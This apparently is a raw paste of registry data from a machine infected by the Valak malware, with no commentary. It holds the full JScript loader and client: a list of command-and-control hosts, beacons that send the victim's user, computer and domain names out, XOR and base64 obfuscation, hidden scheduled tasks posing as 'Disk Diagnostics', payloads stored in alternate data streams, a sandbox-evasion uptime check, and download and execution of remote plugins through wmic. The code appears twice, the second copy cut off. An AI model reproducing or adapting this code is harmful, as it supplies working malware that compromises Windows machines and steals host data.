Valak_config_new

1. #Valak #Config #New
2. Key Name: HKEY_CURRENT_USER\SOFTWARE\ApplicationContainer
3. Class Name: <NO CLASS>
4. Last Write Time: 6/3/2020 - 10:49 PM
5.  
6. Key Name: HKEY_CURRENT_USER\SOFTWARE\ApplicationContainer\Appsw64
7. Class Name: <NO CLASS>
8. Last Write Time: 6/3/2020 - 10:49 PM
9. Value 0
10. Name: ShimV4
11. Type: REG_SZ
12. Data: http://a-zcorner.com
13.  
14. Value 1
15. Name: SetupServiceKey
16. Type: REG_SZ
17. Data: 79e5036f32
18.  
19. Value 2
20. Name: ServerUrl
21. Type: REG_SZ
22. Data: var client_config = {
23. COMMAND_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
24. SOFT_SIG : 'mad29',
25. CLIENT_ID : '7EF8C89EC08D346C7D45FC7994D29D96',
26. C2_REQUEST_SLEEP : 20,
27. C2_FAIL_SLEEP : 1,
28. C2_FAIL_COUNT : 3,
29. C2_OB_KEY : 'JxTRG4mY',
30. SOFT_VERSION : 32,
31.  
32. C2_COMMAND_PREFIX : 'api.aspx',
33.  
34. C2_USE_IEXPLORE : false
35. }
36.  
37. var CLIENT_IMPORT_ENV = true;
38.  
39. var Client = {};
40. Client.CoMainObject = new ActiveXObject('WScript.Shell');
41. Client.LoadLibraryReg = function(){
42. return Client.CoMainObject.RegRead("HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\WebLib32");
43. }
44.  
45. Client.LibraryLoadContext = function(){
46. eval(Client.LoadLibraryReg());
47. Client.Windows = Windows;
48. Client.GlobalStrings = GlobalStrings;
49. Client.DataTools = DataTools;
50. Client.ObjectProducer = ObjectProducer;
51. Client.Http = Http;
52. Client.Loader = Loader;
53. Client.debug = debug;
54.  
55. }
56.  
57.  
58. Client.GetWorkerEndpoint = function(){
59. var nonce = Client.DataTools.Random.String(12);
60. var uid = Client.Loader.GetUid();
61.  
62. var sessionKey = nonce + client_config.C2_OB_KEY;
63.  
64. var encodedId = Client.DataTools.RotString(uid, Client.DataTools.DeriveKey(sessionKey), 0);
65. encodedId = Base64Encode(encodedId);
66. encodedId = encodeURIComponent(encodedId);
67.  
68. return client_config.C2_COMMAND_PREFIX + "?dx11diag=" + encodedId + "&apikey=" + Client.DataTools.Random.String(2) + "&g=" + nonce + "&selected=2";
69. }
70.  
71.  
72. Client.PrepareExectionTask = function(taskName){
73. var currentTime = new Date(),
74. hours = currentTime.getHours(),
75. minutes = currentTime.getMinutes();
76.  
77. hours = hours < 10 ? "0" + hours.toString() : hours;
78. minutes = (minutes + 3) < 10 ? "0" + (minutes + 1).toString() : (minutes + 1);
79. var time = hours + ":" + minutes;
80.  
81. var path = Client.GlobalStrings.NTFILE_PATH.concat(":").concat(taskName);
82. var execCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC, "path=".concat(path).concat("&q=w"));
83. var taskCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.TASK_CREATE, "name=SoundIndex_".concat(taskName).concat("&command=").concat(execCommand).concat("&time=").concat(time))
84.  
85. Client.Windows.Execute(taskCommand);
86. }
87.  
88. Client.ExecutePlugin = function(pluginId){
89. var hostPath = Client.Windows.GetEnv("%temp%").concat("\\").concat(Client.Loader.GetUid()).concat(".bin");
90. var command = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC_ARGS, "path=".concat(hostPath).concat("&args=").concat(pluginId));
91.  
92. Client.Windows.Execute(command);
93.  
94. }
95.  
96.  
97. Client.GetTask = function(){
98. for(var i = 0; i < client_config.COMMAND_C2.length; i++){
99. var response = Client.Http.Request(client_config.COMMAND_C2[i].concat("/").concat(Client.GetWorkerEndpoint()));
100. response = Client.DataTools.RotString(response, Client.DataTools.DeriveKey(Client.Loader.GetUid().concat(client_config.C2_OB_KEY)));
101.  
102. if(response.indexOf("--TASK") !== -1){
103. var executionTask = response.replace('--TASK--', '').split('--')[1];
104. var taskName = response.split('--')[2];
105.  
106. Client.PrepareExectionTask(taskName);
107. Client.Windows.WriteDataStreamBytes(Client.GlobalStrings.NTFILE_PATH, taskName, Base64bytes(executionTask));
108. return;
109. }
110.  
111. if(response.indexOf('--PLUGIN') !== -1){
112. var plugin = response.replace('--PLUGIN--', '');
113. Client.ExecutePlugin(plugin);
114. return;
115. }
116.  
117. WScript.Sleep(client_config.C2_REQUEST_SLEEP * 1000);
118. }
119. }
120.  
121.  
122.  
123. function Base64bytes(string){
124. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
125. var element = XmlDOM.createElement("Base64Data");
126. element.dataType = "bin.base64";
127.  
128. element.text = string;
129.  
130. var stream = WScript.CreateObject("ADODB.Stream");
131. stream.Type = 1;
132. stream.Open();
133.  
134. stream.Write(element.nodeTypedValue);
135. return stream;
136. }
137.  
138.  
139. function StringToBinary(string){
140. var BinaryStream = new ActiveXObject("ADODB.Stream");
141. BinaryStream.Type = 2;
142. BinaryStream.CharSet = "ascii";
143. BinaryStream.Open();
144. BinaryStream.WriteText(string);
145. BinaryStream.Position = 0;
146. BinaryStream.Type = 1;
147. BinaryStream.Position = 0;
148. return BinaryStream.Read();
149. }
150.  
151.  
152. function Base64Encode(string) {
153.  
154. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
155. var element = XmlDOM.createElement("Base64Data");
156. element.dataType = "bin.base64";
157.  
158. element.nodeTypedValue = StringToBinary(string);
159.  
160. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
161. }
162.  
163. Client.LibraryLoadContext();
164.  
165. WScript.Sleep(1 * 60 * 1000);
166.  
167. Client.GetTask();
168.  
169. Value 3
170. Name: WebLib32
171. Type: REG_SZ
172. Data: var config = {
173. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
174. SOFT_SIG : 'mad29',
175. SOFT_VERSION: 32,
176. C2_REQUEST_SLEEP : 21,
177. C2_FAIL_SLEEP : 21,
178. C2_FAIL_COUNT : 20,
179. C2_OB_KEY : 'JxTRG4mY',
180.  
181.  
182. C2_PREFIX : 'rpc.aspx'
183. }
184.  
185.  
186. var SELECTED_C2 = config.PRIMARY_C2[0];
187.  
188.  
189. Math.imul = function (a, b) {
190. var ah = (a >>> 16) & 0xffff;
191. var al = a & 0xffff;
192. var bh = (b >>> 16) & 0xffff;
193. var bl = b & 0xffff;
194. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
195. };
196.  
197.  
198. var GlobalStrings = {
199. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
200. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
201. WMIC_EXEC : "wmic process call create \"%path%\"",
202. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
203. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
204. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
205. ADS_SSID : "HDDScan",
206. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
207. TASK_NAME : "Disk Diagnostics"
208. }
209.  
210.  
211. var ObjectProducer = {}
212. ObjectProducer.AccesibleObjects = {
213. MAIN_SH_OBJECT : 'WScript.Shell',
214. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
215. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
216. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
217. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
218. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
219. };
220.  
221. ObjectProducer.GetRootConstructor = function(){
222. return ActiveXObject;
223. }
224.  
225. ObjectProducer.GetInstance = function(instanceKey){
226. var rootConstructor = ObjectProducer.GetRootConstructor();
227. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
228. }
229.  
230.  
231.  
232. var DataTools = {};
233. DataTools.KEY_BASE = 1029;
234.  
235. DataTools.DeriveKey = function(keyStr){
236. var keyBase = DataTools.KEY_BASE;
237. var key = 0;
238.  
239. for(var i = 0; i < keyStr.length; i++){
240. keyBase = keyBase ^ keyStr.charCodeAt(i);
241. }
242.  
243. var _keyBase = keyBase.toString();
244. for(var i = 0; i < _keyBase.length; i++){
245. key += parseInt(_keyBase.charAt(i));
246. }
247.  
248. return key;
249. }
250.  
251. DataTools.RotString = function(str, key){
252. var rotd = "";
253. for(var i = 0; i < str.length; i++){
254. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
255. }
256.  
257. return rotd;
258. }
259.  
260. DataTools.Hash = function(str){
261. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
262. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
263.  
264. return ((h ^ h >>> 16) >>> 0).toString(16);
265. }
266.  
267. DataTools.Random = {};
268. DataTools.Random.Number = function(min, max){
269. min = Math.ceil(min);
270. max = Math.floor(max);
271. return Math.floor(Math.random() * (max - min + 1)) + min;
272. }
273.  
274. DataTools.Random.String = function(len){
275. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
276. var result = "";
277. for(var i = 0; i < len; i++){
278. var chr = DataTools.Random.Number(0, alphabet.length-1);
279. result = result.concat(alphabet.charAt(chr));
280. }
281.  
282. return result;
283. }
284.  
285.  
286. DataTools.Strings = {};
287. DataTools.Strings.ParseTemplate = function(str, templateStr){
288. var template = templateStr.split('&');
289. for(var i = 0; i < template.length; i++){
290. var keyValue = template[i].split('=');
291. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
292. }
293.  
294. return str;
295. }
296.  
297. var Windows = {};
298. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
299. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
300.  
301. Windows.Execute = function(command){
302. Windows.CoMainObject.Run(command);
303. }
304.  
305. Windows.GetEnv = function(env){
306. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
307. }
308.  
309. Windows.RegRead = function(path){
310. return Windows.CoMainObject.RegRead(path);
311. }
312.  
313. Windows.RegWrite = function(entry, value){
314. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
315. }
316.  
317. Windows.CreateFile = function(path){
318. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
319. fHandle.WriteLine(DataTools.Random.String(1024));
320. fHandle.Close();
321. }
322.  
323. Windows.AppendDataStream = function(path, stream, data){
324. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
325. fHandle.WriteLine(data);
326. fHandle.Close();
327. }
328.  
329. Windows.AppendDataStreamB = function(path, stream, data){
330. data.SaveToFile(path.concat(":").concat(stream), 2);
331. data.Close();
332. }
333.  
334. Windows.WriteData = function(path, data){
335. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
336. fHandle.Write(data);
337. fHandle.Close();
338. }
339.  
340. Windows.WriteBytes = function(path, data){
341. data.SaveToFile(path, 2);
342. data.Close();
343. }
344.  
345. Windows.WriteDataStreamBytes = function(path, stream, data){
346. data.SaveToFile(path.concat(":").concat(stream), 2);
347. data.Close();
348. }
349.  
350. Windows.ReadFile = function(path){
351. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
352. return fHandle.ReadAll();
353. }
354.  
355. Windows.GetWMIProvider = function(pcname){
356. return GetObject("winmgmts:"+
357. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
358. }
359.  
360. Windows.GetUptime = function(){
361. try{
362. var wmi = Windows.GetWMIProvider(".");
363. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
364. var e = new Enumerator(queryResult);
365.  
366. return parseInt(e.item().SystemUpTime);
367. }catch(e){
368. return 0;
369. }
370. }
371.  
372. Windows.GetArch = function(){
373. var architecture = "64";
374. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
375.  
376. if(product.indexOf('Windows 7') != -1){
377. architecture = "32";
378. }
379.  
380. return architecture;
381. }
382.  
383.  
384. var Http = {};
385. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
386. Http.Request = function(url){
387. try{
388. Http.Client.Open('GET', url, false);
389. Http.Client.Send();
390.  
391. if(Http.Client.Status == 200)
392. return Http.Client.ResponseText;
393. else
394. return "";
395. }catch(e){
396. return ""
397. }
398. }
399.  
400.  
401. var Loader = {};
402. Loader.USERNAME = Windows.GetEnv("%username%");
403. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
404. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
405. Loader.Uptime = Windows.GetUptime();
406. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
407.  
408. Loader.GetUid = function(){
409. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
410. }
411.  
412. Loader.GetInitialRequest = function(nonce){
413. var uid = Loader.GetUid();
414. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
415.  
416. var sessionKey = nonce + config.C2_OB_KEY;
417. request = request.join(":");
418. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
419. request = Base64Encode(request);
420.  
421. return encodeURIComponent(request);
422. }
423.  
424. Loader.GetInitialEndpoint = function(){
425. var nonce = DataTools.Random.String(12)
426. var request = Loader.GetInitialRequest(nonce);
427.  
428. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
429. return endpoint;
430. }
431.  
432. Loader.DeployHost = function(){
433. var temp = Windows.GetEnv("%temp%");
434. var architecture = Windows.GetArch();
435. var nonce = DataTools.Random.String(12);
436. var uid = Loader.GetUid();
437. var sessionKey = nonce + config.C2_OB_KEY;
438.  
439. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
440. encodedId = Base64Encode(encodedId);
441. encodedId = encodeURIComponent(encodedId);
442.  
443. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
444. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
445.  
446. var filename = uid.concat(".bin");
447.  
448. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
449. return temp.concat("\\").concat(filename);
450.  
451. }
452.  
453. Loader.DeployClient = function() {
454. if (Loader.Uptime <= 3000) {
455. WScript.Quit(0);
456. }
457.  
458. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
459. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
460. try {
461. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
462. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
463.  
464. if (response.indexOf('<<<CLIENT__') !== -1) {
465. var client = response.replace('<<<CLIENT__', '');
466. client = Base64text(client);
467.  
468. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
469. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
470.  
471. SELECTED_C2 = config.PRIMARY_C2[j];
472. Loader.Persist(client);
473. return;
474.  
475. }
476. } catch (e) {
477.  
478. }
479.  
480. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
481. }
482. }
483. }
484.  
485. Loader.Persist = function(client){
486.  
487. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
488. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
489.  
490. Windows.Execute(taskCommand);
491. Windows.RegWrite("ServerUrl", client);
492. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
493.  
494. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
495.  
496. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
497.  
498. Loader.DeployHost();
499. }
500.  
501. function debug(message){
502. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
503. }
504.  
505.  
506. function Base64text(string){
507. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
508. var element = XmlDOM.createElement("tempContainer");
509. element.dataType = "bin.Base64";
510. element.text = string;
511.  
512. var stream = WScript.CreateObject("ADODB.Stream");
513. stream.Type = 1;
514. stream.Open();
515. stream.Write(element.nodeTypedValue);
516.  
517. stream.Position = 0;
518. stream.Type = 2;
519. stream.CharSet = "utf-8";
520.  
521. return stream.ReadText();
522. }
523.  
524. function StringToBinary(string){
525. var BinaryStream = new ActiveXObject("ADODB.Stream");
526. BinaryStream.Type = 2;
527. BinaryStream.CharSet = "ascii";
528. BinaryStream.Open();
529. BinaryStream.WriteText(string);
530. BinaryStream.Position = 0;
531. BinaryStream.Type = 1;
532. BinaryStream.Position = 0;
533. return BinaryStream.Read();
534. }
535.  
536.  
537. function Base64bytes(string){
538. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
539. var element = XmlDOM.createElement("Base64Data");
540. element.dataType = "bin.base64";
541.  
542. element.text = string;
543.  
544. var stream = WScript.CreateObject("ADODB.Stream");
545. stream.Type = 1;
546. stream.Open();
547.  
548. stream.Write(element.nodeTypedValue);
549. return stream;
550. }
551.  
552. function Base64Encode(string) {
553.  
554. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
555. var element = XmlDOM.createElement("Base64Data");
556. element.dataType = "bin.base64";
557.  
558. element.nodeTypedValue = StringToBinary(string);
559.  
560. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
561. }
562.  
563.  
564. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
565. Loader.DeployClient();
566. }
567. var config = {
568. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
569. SOFT_SIG : 'mad29',
570. SOFT_VERSION: 32,
571. C2_REQUEST_SLEEP : 21,
572. C2_FAIL_SLEEP : 21,
573. C2_FAIL_COUNT : 20,
574. C2_OB_KEY : 'JxTRG4mY',
575.  
576.  
577. C2_PREFIX : 'rpc.aspx'
578. }
579.  
580.  
581. var SELECTED_C2 = config.PRIMARY_C2[0];
582.  
583.  
584. Math.imul = function (a, b) {
585. var ah = (a >>> 16) & 0xffff;
586. var al = a & 0xffff;
587. var bh = (b >>> 16) & 0xffff;
588. var bl = b & 0xffff;
589. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
590. };
591.  
592.  
593. var GlobalStrings = {
594. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
595. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
596. WMIC_EXEC : "wmic process call create \"%path%\"",
597. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
598. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
599. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
600. ADS_SSID : "HDDScan",
601. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
602. TASK_NAME : "Disk Diagnostics"
603. }
604.  
605.  
606. var ObjectProducer = {}
607. ObjectProducer.AccesibleObjects = {
608. MAIN_SH_OBJECT : 'WScript.Shell',
609. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
610. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
611. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
612. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
613. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
614. };
615.  
616. ObjectProducer.GetRootConstructor = function(){
617. return ActiveXObject;
618. }
619.  
620. ObjectProducer.GetInstance = function(instanceKey){
621. var rootConstructor = ObjectProducer.GetRootConstructor();
622. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
623. }
624.  
625.  
626.  
627. var DataTools = {};
628. DataTools.KEY_BASE = 1029;
629.  
630. DataTools.DeriveKey = function(keyStr){
631. var keyBase = DataTools.KEY_BASE;
632. var key = 0;
633.  
634. for(var i = 0; i < keyStr.length; i++){
635. keyBase = keyBase ^ keyStr.charCodeAt(i);
636. }
637.  
638. var _keyBase = keyBase.toString();
639. for(var i = 0; i < _keyBase.length; i++){
640. key += parseInt(_keyBase.charAt(i));
641. }
642.  
643. return key;
644. }
645.  
646. DataTools.RotString = function(str, key){
647. var rotd = "";
648. for(var i = 0; i < str.length; i++){
649. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
650. }
651.  
652. return rotd;
653. }
654.  
655. DataTools.Hash = function(str){
656. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
657. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
658.  
659. return ((h ^ h >>> 16) >>> 0).toString(16);
660. }
661.  
662. DataTools.Random = {};
663. DataTools.Random.Number = function(min, max){
664. min = Math.ceil(min);
665. max = Math.floor(max);
666. return Math.floor(Math.random() * (max - min + 1)) + min;
667. }
668.  
669. DataTools.Random.String = function(len){
670. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
671. var result = "";
672. for(var i = 0; i < len; i++){
673. var chr = DataTools.Random.Number(0, alphabet.length-1);
674. result = result.concat(alphabet.charAt(chr));
675. }
676.  
677. return result;
678. }
679.  
680.  
681. DataTools.Strings = {};
682. DataTools.Strings.ParseTemplate = function(str, templateStr){
683. var template = templateStr.split('&');
684. for(var i = 0; i < template.length; i++){
685. var keyValue = template[i].split('=');
686. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
687. }
688.  
689. return str;
690. }
691.  
692. var Windows = {};
693. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
694. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
695.  
696. Windows.Execute = function(command){
697. Windows.CoMainObject.Run(command);
698. }
699.  
700. Windows.GetEnv = function(env){
701. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
702. }
703.  
704. Windows.RegRead = function(path){
705. return Windows.CoMainObject.RegRead(path);
706. }
707.  
708. Windows.RegWrite = function(entry, value){
709. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
710. }
711.  
712. Windows.CreateFile = function(path){
713. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
714. fHandle.WriteLine(DataTools.Random.String(1024));
715. fHandle.Close();
716. }
717.  
718. Windows.AppendDataStream = function(path, stream, data){
719. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
720. fHandle.WriteLine(data);
721. fHandle.Close();
722. }
723.  
724. Windows.AppendDataStreamB = function(path, stream, data){
725. data.SaveToFile(path.concat(":").concat(stream), 2);
726. data.Close();
727. }
728.  
729. Windows.WriteData = function(path, data){
730. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
731. fHandle.Write(data);
732. fHandle.Close();
733. }
734.  
735. Windows.WriteBytes = function(path, data){
736. data.SaveToFile(path, 2);
737. data.Close();
738. }
739.  
740. Windows.WriteDataStreamBytes = function(path, stream, data){
741. data.SaveToFile(path.concat(":").concat(stream), 2);
742. data.Close();
743. }
744.  
745. Windows.ReadFile = function(path){
746. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
747. return fHandle.ReadAll();
748. }
749.  
750. Windows.GetWMIProvider = function(pcname){
751. return GetObject("winmgmts:"+
752. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
753. }
754.  
755. Windows.GetUptime = function(){
756. try{
757. var wmi = Windows.GetWMIProvider(".");
758. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
759. var e = new Enumerator(queryResult);
760.  
761. return parseInt(e.item().SystemUpTime);
762. }catch(e){
763. return 0;
764. }
765. }
766.  
767. Windows.GetArch = function(){
768. var architecture = "64";
769. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
770.  
771. if(product.indexOf('Windows 7') != -1){
772. architecture = "32";
773. }
774.  
775. return architecture;
776. }
777.  
778.  
779. var Http = {};
780. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
781. Http.Request = function(url){
782. try{
783. Http.Client.Open('GET', url, false);
784. Http.Client.Send();
785.  
786. if(Http.Client.Status == 200)
787. return Http.Client.ResponseText;
788. else
789. return "";
790. }catch(e){
791. return ""
792. }
793. }
794.  
795.  
796. var Loader = {};
797. Loader.USERNAME = Windows.GetEnv("%username%");
798. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
799. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
800. Loader.Uptime = Windows.GetUptime();
801. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
802.  
803. Loader.GetUid = function(){
804. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
805. }
806.  
807. Loader.GetInitialRequest = function(nonce){
808. var uid = Loader.GetUid();
809. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
810.  
811. var sessionKey = nonce + config.C2_OB_KEY;
812. request = request.join(":");
813. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
814. request = Base64Encode(request);
815.  
816. return encodeURIComponent(request);
817. }
818.  
819. Loader.GetInitialEndpoint = function(){
820. var nonce = DataTools.Random.String(12)
821. var request = Loader.GetInitialRequest(nonce);
822.  
823. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
824. return endpoint;
825. }
826.  
827. Loader.DeployHost = function(){
828. var temp = Windows.GetEnv("%temp%");
829. var architecture = Windows.GetArch();
830. var nonce = DataTools.Random.String(12);
831. var uid = Loader.GetUid();
832. var sessionKey = nonce + config.C2_OB_KEY;
833.  
834. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
835. encodedId = Base64Encode(encodedId);
836. encodedId = encodeURIComponent(encodedId);
837.  
838. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
839. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
840.  
841. var filename = uid.concat(".bin");
842.  
843. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
844. return temp.concat("\\").concat(filename);
845.  
846. }
847.  
848. Loader.DeployClient = function() {
849. if (Loader.Uptime <= 3000) {
850. WScript.Quit(0);
851. }
852.  
853. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
854. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
855. try {
856. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
857. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
858.  
859. if (response.indexOf('<<<CLIENT__') !== -1) {
860. var client = response.replace('<<<CLIENT__', '');
861. client = Base64text(client);
862.  
863. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
864. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
865.  
866. SELECTED_C2 = config.PRIMARY_C2[j];
867. Loader.Persist(client);
868. return;
869.  
870. }
871. } catch (e) {
872.  
873. }
874.  
875. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
876. }
877. }
878. }
879.  
880. Loader.Persist = function(client){
881.  
882. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
883. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
884.  
885. Windows.Execute(taskCommand);
886. Windows.RegWrite("ServerUrl", client);
887. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
888.  
889. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
890.  
891. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
892.  
893. Loader.DeployHost();
894. }
895.  
896. function debug(message){
